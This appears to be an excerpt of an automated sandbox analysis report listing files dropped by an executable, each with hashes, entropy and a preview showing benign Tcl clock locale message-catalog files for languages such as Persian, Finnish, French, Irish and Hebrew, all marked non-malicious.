                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):426
                                                                                                                                                                                                                              Entropy (8bit):5.12739029869254
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383D2WGz7A/3vy3v6TANCmK3vz7AAbn:4aR83DoPivkvFk5vPN
                                                                                                                                                                                                                              MD5:9778A7C3ABD37ECBEC0BB9715E52FAF8
                                                                                                                                                                                                                              SHA1:D8063CA7779674EB1D9FE3E4B4774DB20B93038B
                                                                                                                                                                                                                              SHA-256:3D9779C27E8960143D00961F6E82124120FD47B7F3CB82DB3DF21CDD9090C707
                                                                                                                                                                                                                              SHA-512:B90B4A96CE5E8B9BF512B98C406603C60EA00F6740D04CD1FC30810C7155A37851AE5E28716F959137806F1A9E3152D2A0D79B8EA7E681A0737A28593657DE66
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fa_IR AM "\u0635\u0628\u062d".. ::msgcat::mcset fa_IR PM "\u0639\u0635\u0631".. ::msgcat::mcset fa_IR DATE_FORMAT "%d\u2044%m\u2044%Y".. ::msgcat::mcset fa_IR TIME_FORMAT "%S:%M:%H".. ::msgcat::mcset fa_IR TIME_FORMAT_12 "%S:%M:%l %P".. ::msgcat::mcset fa_IR DATE_TIME_FORMAT "%d\u2044%m\u2044%Y %S:%M:%H %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1195
                                                                                                                                                                                                                              Entropy (8bit):4.32217771842326
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83KTvIhmuw4tW/UWJTttWKeqA+3ewvtyv3e6:43YvIwuw4t05ttnlzt0p
                                                                                                                                                                                                                              MD5:CC06F0ABD8F985654DAD8256598EBCB7
                                                                                                                                                                                                                              SHA1:71C880F9F395ACD32AF7F538033211F392F83645
                                                                                                                                                                                                                              SHA-256:9929A6B7139BD7E0F29487F7888A83E4C4F5E9CE0352738CFCA94EE2DDF3BD6B
                                                                                                                                                                                                                              SHA-512:E1292665270B6FBF7738CC3864B55194E7B827C6AD9492FB2E54DC1B626159B243052CE502335B9D92E2B8F58A4DD1FA0E628CB6A9D1D3A652FE2B93A3FB711A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fi DAYS_OF_WEEK_ABBREV [list \.. "su"\.. "ma"\.. "ti"\.. "ke"\.. "to"\.. "pe"\.. "la"].. ::msgcat::mcset fi DAYS_OF_WEEK_FULL [list \.. "sunnuntai"\.. "maanantai"\.. "tiistai"\.. "keskiviikko"\.. "torstai"\.. "perjantai"\.. "lauantai"].. ::msgcat::mcset fi MONTHS_ABBREV [list \.. "tammi"\.. "helmi"\.. "maalis"\.. "huhti"\.. "touko"\.. "kes\u00e4"\.. "hein\u00e4"\.. "elo"\.. "syys"\.. "loka"\.. "marras"\.. "joulu"\.. ""].. ::msgcat::mcset fi MONTHS_FULL [list \.. "tammikuu"\.. "helmikuu"\.. "maaliskuu"\.. "huhtikuu"\.. "toukokuu"\.. "kes\u00e4kuu"\.. "hein\u00e4kuu"\.. "elokuu"\.. "syyskuu"\.. "lokakuu"\.. "marraskuu"\..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1033
                                                                                                                                                                                                                              Entropy (8bit):4.15884265510429
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR834YPxTSBFSa+E6rIsmYmyAxyIQbXHU92W1T:43a6rIyAE0B
                                                                                                                                                                                                                              MD5:5D224E66FD9521CA4327D4F164CD6585
                                                                                                                                                                                                                              SHA1:FC8F4C1D9A69931679028DE02155D96A18F6542E
                                                                                                                                                                                                                              SHA-256:2EC9B03469FA38B260915C93318F446EA5E12B9090BD441936B57552EBA1E3C9
                                                                                                                                                                                                                              SHA-512:0E0F97D99F0274A8A92AA7DC992B252A0BB696D69A8835602D8F4C03A6A15780F45971F00863436949CD81AD7DF6EE6BC463CE5B9FECF5E39508BA4D4E83C693
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fo DAYS_OF_WEEK_ABBREV [list \.. "sun"\.. "m\u00e1n"\.. "t\u00fds"\.. "mik"\.. "h\u00f3s"\.. "fr\u00ed"\.. "ley"].. ::msgcat::mcset fo DAYS_OF_WEEK_FULL [list \.. "sunnudagur"\.. "m\u00e1nadagur"\.. "t\u00fdsdagur"\.. "mikudagur"\.. "h\u00f3sdagur"\.. "fr\u00edggjadagur"\.. "leygardagur"].. ::msgcat::mcset fo MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "mai"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "des"\.. ""].. ::msgcat::mcset fo MONTHS_FULL [list \.. "januar"\.. "februar"\.. "mars"\.. "apr\u00edl"\.. "mai"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):286
                                                                                                                                                                                                                              Entropy (8bit):4.864028070948858
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoZA4WjoZd3vLjoZd3v6mjoZd+3vnFDoAkvn:4EnLB3831P23vS3v6u3v9dmn
                                                                                                                                                                                                                              MD5:92E2B6483B2374817548F4EAA1731820
                                                                                                                                                                                                                              SHA1:071E1E9368CCB4EC864E78622B2113F460920203
                                                                                                                                                                                                                              SHA-256:C3DCCF5E5904C24D4AD9AAA36160A78F5397A7452510C0C0E61DE4DE863305CB
                                                                                                                                                                                                                              SHA-512:E79D4D38A22298252FA46D15C383CFB2A1E49E8196C265A58F9BA4982DFD9CE29E87C0B85BE3F39617359451831B792FCD3092A52EDF8FFD999AFE5CFE1D170D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fo_FO DATE_FORMAT "%d/%m-%Y".. ::msgcat::mcset fo_FO TIME_FORMAT "%T".. ::msgcat::mcset fo_FO TIME_FORMAT_12 "%T".. ::msgcat::mcset fo_FO DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1257
                                                                                                                                                                                                                              Entropy (8bit):4.383721663740675
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR835LzAX2t6KOkPwzZIGzRmzQf1waGqHvivh:43mlwIFZtA/qPkh
                                                                                                                                                                                                                              MD5:4D63B4A7CF13A28A6F6784B5597EEF43
                                                                                                                                                                                                                              SHA1:FE1B35A93CB72666D7D6BC37D9BE081B05A00CD9
                                                                                                                                                                                                                              SHA-256:96B1E1E12CD13A56722EBF27D362C70B467342FA1282A40B89FB16B5105A0480
                                                                                                                                                                                                                              SHA-512:5647CAE859B62C7CE1CEE6426A076361D2A29EFE6B6F311DDC0E7D006194BA68D575852FEC5FDE2AB43DF8AE440C57013D32A3951095CB856327070FD9BD1C76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fr DAYS_OF_WEEK_ABBREV [list \.. "dim."\.. "lun."\.. "mar."\.. "mer."\.. "jeu."\.. "ven."\.. "sam."].. ::msgcat::mcset fr DAYS_OF_WEEK_FULL [list \.. "dimanche"\.. "lundi"\.. "mardi"\.. "mercredi"\.. "jeudi"\.. "vendredi"\.. "samedi"].. ::msgcat::mcset fr MONTHS_ABBREV [list \.. "janv."\.. "f\u00e9vr."\.. "mars"\.. "avr."\.. "mai"\.. "juin"\.. "juil."\.. "ao\u00fbt"\.. "sept."\.. "oct."\.. "nov."\.. "d\u00e9c."\.. ""].. ::msgcat::mcset fr MONTHS_FULL [list \.. "janvier"\.. "f\u00e9vrier"\.. "mars"\.. "avril"\.. "mai"\.. "juin"\.. "juillet"\.. "ao\u00fbt"\.. "septembre"\.. "octobre"\.. "novembre"\.. "d\u00e9cembre
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):286
                                                                                                                                                                                                                              Entropy (8bit):4.910112619660625
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoXqyFjoIX3vLjoIX3v6mjog+3vnFDoAkvn:4EnLB383AqWv3vL3v6d3v9dmn
                                                                                                                                                                                                                              MD5:07EEADB8C2F2425FF9A27E46A81827A2
                                                                                                                                                                                                                              SHA1:AA18A651C64098C7885F1F869B9F221453F42987
                                                                                                                                                                                                                              SHA-256:AAD828BCBB512FBD9902DCDD3812247A74913CC574DEB07DA95A7BBE74B1FE48
                                                                                                                                                                                                                              SHA-512:1FA60B1A69B2F5FD2C009EC18695A937C4484D7C418F7E8398D95723B857698143E0584A546F9032B75894730CBBEF78453061AC13D90199FF702E148D983C28
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fr_BE DATE_FORMAT "%d/%m/%y".. ::msgcat::mcset fr_BE TIME_FORMAT "%T".. ::msgcat::mcset fr_BE TIME_FORMAT_12 "%T".. ::msgcat::mcset fr_BE DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):286
                                                                                                                                                                                                                              Entropy (8bit):4.890376345610709
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xooIso13vLjo13v6mjo1+3vnFDoAkvn:4EnLB383vIF3vU3v6A3v9dmn
                                                                                                                                                                                                                              MD5:2F70BDDE7685E2892C5F79C632FC2F0F
                                                                                                                                                                                                                              SHA1:FD1A6F6042E59D1563ABB5858C348C1D785C435E
                                                                                                                                                                                                                              SHA-256:0624DF9A56723DDB89E59736C20A5837DEA2206A789EBE7EEF19AD287590CA45
                                                                                                                                                                                                                              SHA-512:50FC0C91AB2C75FFC4F100C0D42DFC4B2101DB9713FD77E6FF5BF3F25A0AF4A535A4709CF4586809CEEE76C25B66ABC0DD4FD61524510C57AA0E63EA8F46E8D5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fr_CA DATE_FORMAT "%Y-%m-%d".. ::msgcat::mcset fr_CA TIME_FORMAT "%T".. ::msgcat::mcset fr_CA TIME_FORMAT_12 "%T".. ::msgcat::mcset fr_CA DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):288
                                                                                                                                                                                                                              Entropy (8bit):4.913241133684606
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoFt28oF+3vLjoF+3v6mjo++3vnFDoAkvn:4EnLB383yte+3vs+3v6/3v9dmn
                                                                                                                                                                                                                              MD5:83FC7EBA68C3727F7C13C8EEAF79823F
                                                                                                                                                                                                                              SHA1:81C27F9B97F5F5190F7189230535EC09CD228158
                                                                                                                                                                                                                              SHA-256:290CA6EB74BAEAC4E2420D0755D148849F89EE87E37860F25CBB7B8AFA3EDCBC
                                                                                                                                                                                                                              SHA-512:35DA46558A246D7B3FAB02208001CE986E2E6DD88D6318AF743F4E81CA6920471D1425BB009A7476A79E7F61E1353C027B765331CD8EFA07A9E884DCB73F2195
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fr_CH DATE_FORMAT "%d. %m. %y".. ::msgcat::mcset fr_CH TIME_FORMAT "%T".. ::msgcat::mcset fr_CH TIME_FORMAT_12 "%T".. ::msgcat::mcset fr_CH DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1188
                                                                                                                                                                                                                              Entropy (8bit):4.314271783103334
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR835k0CM/hlrXa754pD73/tKSx54pbIK5f2CA:43W05rXUa173/VadDA
                                                                                                                                                                                                                              MD5:67D137E5D853DB61A4B4264871E793F7
                                                                                                                                                                                                                              SHA1:4280E7F662DE792175AF8B4C93874F035F716F0F
                                                                                                                                                                                                                              SHA-256:880806867ACABD9B39E3029A5ADD26B690CC5709082D43B0959EBA725EA07AB5
                                                                                                                                                                                                                              SHA-512:C27B745143539D3E6D94BB754DCA35065CDE9B1AA6EE038D47F658175CFACC20236124D38BE5BBB03CAF8F613BD748C43CB8DFCC9234E915D18B5A477BAEF94E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ga DAYS_OF_WEEK_ABBREV [list \.. "Domh"\.. "Luan"\.. "M\u00e1irt"\.. "C\u00e9ad"\.. "D\u00e9ar"\.. "Aoine"\.. "Sath"].. ::msgcat::mcset ga DAYS_OF_WEEK_FULL [list \.. "D\u00e9 Domhnaigh"\.. "D\u00e9 Luain"\.. "D\u00e9 M\u00e1irt"\.. "D\u00e9 C\u00e9adaoin"\.. "D\u00e9ardaoin"\.. "D\u00e9 hAoine"\.. "D\u00e9 Sathairn"].. ::msgcat::mcset ga MONTHS_ABBREV [list \.. "Ean"\.. "Feabh"\.. "M\u00e1rta"\.. "Aib"\.. "Beal"\.. "Meith"\.. "I\u00fail"\.. "L\u00fan"\.. "MF\u00f3mh"\.. "DF\u00f3mh"\.. "Samh"\.. "Noll"\.. ""].. ::msgcat::mcset ga MONTHS_FULL [list \.. "Ean\u00e1ir"\.. "Feabhra"\.. "M\u00e1rta"\.. "Aibre\u00e1n"\.. "M\u00ed na Bealtaine"\.. "Meith"\..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):286
                                                                                                                                                                                                                              Entropy (8bit):4.824539027053997
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xobHAygDobHAqo+3vLjobHAqo+3v6mjobHAy9+3vnFDoAkv:4EnLB383p23vy3v6a3v9dmn
                                                                                                                                                                                                                              MD5:C27BD7F317AAADB380F4C38AE0D2FDA6
                                                                                                                                                                                                                              SHA1:79870A0E68AA0A9B301414EDC21889F83BB81E40
                                                                                                                                                                                                                              SHA-256:3F9615C617D3CDBC1E127B3EFEE785B0CB5E92E17B7DABAC80DA2BEAF076362C
                                                                                                                                                                                                                              SHA-512:3605B9A914284CF1D3CC90DF2F21A86C0472AEE59800942DC93D842C7AE164E1DA72813787F163DC80B72269D2C391953ABAD6A8B72CCF069BEE96D418A173E9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ga_IE DATE_FORMAT "%d.%m.%y".. ::msgcat::mcset ga_IE TIME_FORMAT "%T".. ::msgcat::mcset ga_IE TIME_FORMAT_12 "%T".. ::msgcat::mcset ga_IE DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):997
                                                                                                                                                                                                                              Entropy (8bit):4.120890519790248
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83okzalCcPdJ5rK8yzMY4JlV1ZDqqIkFo8w:43JkPj9K8y4HHZLIQtw
                                                                                                                                                                                                                              MD5:A3D098C1A47E380F7C25233A52FBDE38
                                                                                                                                                                                                                              SHA1:C97E4EAA9E7A7F99950F422B93C57134B532C639
                                                                                                                                                                                                                              SHA-256:34D61B49DBF9584893051FFB458D6DE9E7E2E7774AC0011F70C4DD4184EBA81C
                                                                                                                                                                                                                              SHA-512:4687AB3D2FAA65FED90678EBC08C074959E93A9FEFAF3D61EEE39DB08FD200CB57C0DDB4DDBF6451FE1EF5E07EA976EDEF830769FF403CE51734129CEF24DA9F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gl DAYS_OF_WEEK_ABBREV [list \.. "Dom"\.. "Lun"\.. "Mar"\.. "M\u00e9r"\.. "Xov"\.. "Ven"\.. "S\u00e1b"].. ::msgcat::mcset gl DAYS_OF_WEEK_FULL [list \.. "Domingo"\.. "Luns"\.. "Martes"\.. "M\u00e9rcores"\.. "Xoves"\.. "Venres"\.. "S\u00e1bado"].. ::msgcat::mcset gl MONTHS_ABBREV [list \.. "Xan"\.. "Feb"\.. "Mar"\.. "Abr"\.. "Mai"\.. "Xu\u00f1"\.. "Xul"\.. "Ago"\.. "Set"\.. "Out"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset gl MONTHS_FULL [list \.. "Xaneiro"\.. "Febreiro"\.. "Marzo"\.. "Abril"\.. "Maio"\.. "Xu\u00f1o"\.. "Xullo"\.. "Agosto"\.. "Setembro"\.. "Outubro"\.. "Novembro"\.. "Decembro"\.. ""]..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.886176304042503
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoPhkgMoPxsF3v6ay/5oPhk9+3vR6HyFvn:4EnLB383WrfK3v6ay/WJ3voSVn
                                                                                                                                                                                                                              MD5:78B9163C5E8E5E7049CBF91D1A5889A4
                                                                                                                                                                                                                              SHA1:F2F07AF3D79D61C8E0C73B13E2CA8266E10E396B
                                                                                                                                                                                                                              SHA-256:B5688CA07D713227B713655877710258CD503617E8DF79293A971649E3134F05
                                                                                                                                                                                                                              SHA-512:E86074B687670542CFA097C94D150292E1A73C9F231E92CD84386580A446569CC6F8F5817F46ED64A1D00F95D59F6F1F5D4B961DF3C8335938D83F3517794353
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gl_ES DATE_FORMAT "%d %B %Y".. ::msgcat::mcset gl_ES TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset gl_ES DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1084
                                                                                                                                                                                                                              Entropy (8bit):4.213672208102291
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR832vTXAC2/fS5JfaCroeLaCAQbSm5qJe1:43QTXs32zrf
                                                                                                                                                                                                                              MD5:518FC3964D50854081FB79189A42D3E7
                                                                                                                                                                                                                              SHA1:59392F16CD56E3E6A685F78974D539FB3A972B98
                                                                                                                                                                                                                              SHA-256:404795F2C88D0038F9ED0B5120A251D26EDF8B236E1B1698BC71ACD4DC75AC45
                                                                                                                                                                                                                              SHA-512:E5C88CAB8741D631938CEC2E0959C0FE26685C395F5F9F4F1B5C9E146E84D23D897CD7A823AB46D4B62C590AE15EC76B87EB59308ACFB1BB6F61398890B43622
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gv DAYS_OF_WEEK_ABBREV [list \.. "Jed"\.. "Jel"\.. "Jem"\.. "Jerc"\.. "Jerd"\.. "Jeh"\.. "Jes"].. ::msgcat::mcset gv DAYS_OF_WEEK_FULL [list \.. "Jedoonee"\.. "Jelhein"\.. "Jemayrt"\.. "Jercean"\.. "Jerdein"\.. "Jeheiney"\.. "Jesarn"].. ::msgcat::mcset gv MONTHS_ABBREV [list \.. "J-guer"\.. "T-arree"\.. "Mayrnt"\.. "Avrril"\.. "Boaldyn"\.. "M-souree"\.. "J-souree"\.. "Luanistyn"\.. "M-fouyir"\.. "J-fouyir"\.. "M.Houney"\.. "M.Nollick"\.. ""].. ::msgcat::mcset gv MONTHS_FULL [list \.. "Jerrey-geuree"\.. "Toshiaght-arree"\.. "Mayrnt"\.. "Averil"\.. "Boaldyn"\.. "Mean-souree"\.. "Jerrey-souree"\.. "Luanistyn"\.. "Mean-fouyir"\..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.936566750568767
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoQbtvMoQLE3v6ay/5oQbto+3vR6HyFvn:4EnLB383PbtvALE3v6ay/PbtF3voSVn
                                                                                                                                                                                                                              MD5:0B6BE614EF5F5F25A30D2D33701A9F94
                                                                                                                                                                                                                              SHA1:65800FBD73D9DAE550E04E1D818A6B9D1AEF86FE
                                                                                                                                                                                                                              SHA-256:86CABF3B9360C0E686CC4CBEB843E971C28BC6D35210ED378B54EB58CC41F3D5
                                                                                                                                                                                                                              SHA-512:376D21B38DA49A8F7C2983F2B808FD55AC9F6383BC66DF28DB99DBF61FDC9FFF8CD20F077EC3ED873EF47F0F613BDD9AD02DFFB1CB51F9A36715C7FC798C3B70
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gv_GB DATE_FORMAT "%d %B %Y".. ::msgcat::mcset gv_GB TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset gv_GB DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1990
                                                                                                                                                                                                                              Entropy (8bit):4.298934047406144
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83Y71LCLxL0eCLbCLKCLaCLXL7CLB0p1dLGCoCLU5LT5Gv5LJ9p5LnLEHLGCh:43sl7KqpU/nNbhbOezd2ICn
                                                                                                                                                                                                                              MD5:A0E60036EB17208A449AAFC3AAAE622C
                                                                                                                                                                                                                              SHA1:9D7479BA85FBB00A2DF2B61F4ED2CBEA8F1EC8C3
                                                                                                                                                                                                                              SHA-256:787DA79AF58872BF45AB09E3B6A920A4496B5BD8A4F3C7F010CF013EC2E8EFE0
                                                                                                                                                                                                                              SHA-512:46D12C14B5736E5EA97EB728BF58999E9D7C2CF910D8F5AFA3F5D3A86329ABF41A3E2BEBD81EE4EF64BEA0DC173B77A9FE12471C1BD9D768ED552A55B3B80213
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset he DAYS_OF_WEEK_ABBREV [list \.. "\u05d0"\.. "\u05d1"\.. "\u05d2"\.. "\u05d3"\.. "\u05d4"\.. "\u05d5"\.. "\u05e9"].. ::msgcat::mcset he DAYS_OF_WEEK_FULL [list \.. "\u05d9\u05d5\u05dd \u05e8\u05d0\u05e9\u05d5\u05df"\.. "\u05d9\u05d5\u05dd \u05e9\u05e0\u05d9"\.. "\u05d9\u05d5\u05dd \u05e9\u05dc\u05d9\u05e9\u05d9"\.. "\u05d9\u05d5\u05dd \u05e8\u05d1\u05d9\u05e2\u05d9"\.. "\u05d9\u05d5\u05dd \u05d7\u05de\u05d9\u05e9\u05d9"\.. "\u05d9\u05d5\u05dd \u05e9\u05d9\u05e9\u05d9"\.. "\u05e9\u05d1\u05ea"].. ::msgcat::mcset he MONTHS_ABBREV [list \.. "\u05d9\u05e0\u05d5"\.. "\u05e4\u05d1\u05e8"\.. "\u05de\u05e8\u05e5"\.. "\u05d0\u05e4\u05e8"\.. "\u05de\u05d0\u05d9"\.. "\u05d9\u05d5\u05e0"\.. "\u05d9\u05d5\u05dc"\.. "\u05d0\u05d5\u05d2"\..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1777
                                                                                                                                                                                                                              Entropy (8bit):4.2117128941697715
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:438n4kALqrU1fbokQTbWqrU1fbokQTw38:28OD86D8gM
                                                                                                                                                                                                                              MD5:4219A929E27308ADC04A9F368F063F38
                                                                                                                                                                                                                              SHA1:FA728EEBA8751F4CE032ED32AECFDE124D1B68E2
                                                                                                                                                                                                                              SHA-256:192F4A8E77E1627712F85533C9896EF6A040157C7BD56DF3A4A7FA56AD6746C2
                                                                                                                                                                                                                              SHA-512:223B137AC1FC15908F5541067736EF3A29493549B963393EB78660036A82982E57CFC4AD09CBD33D32A5187FF9F4ACFB5F83A0C974702434B7FAD1B2539B7F76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
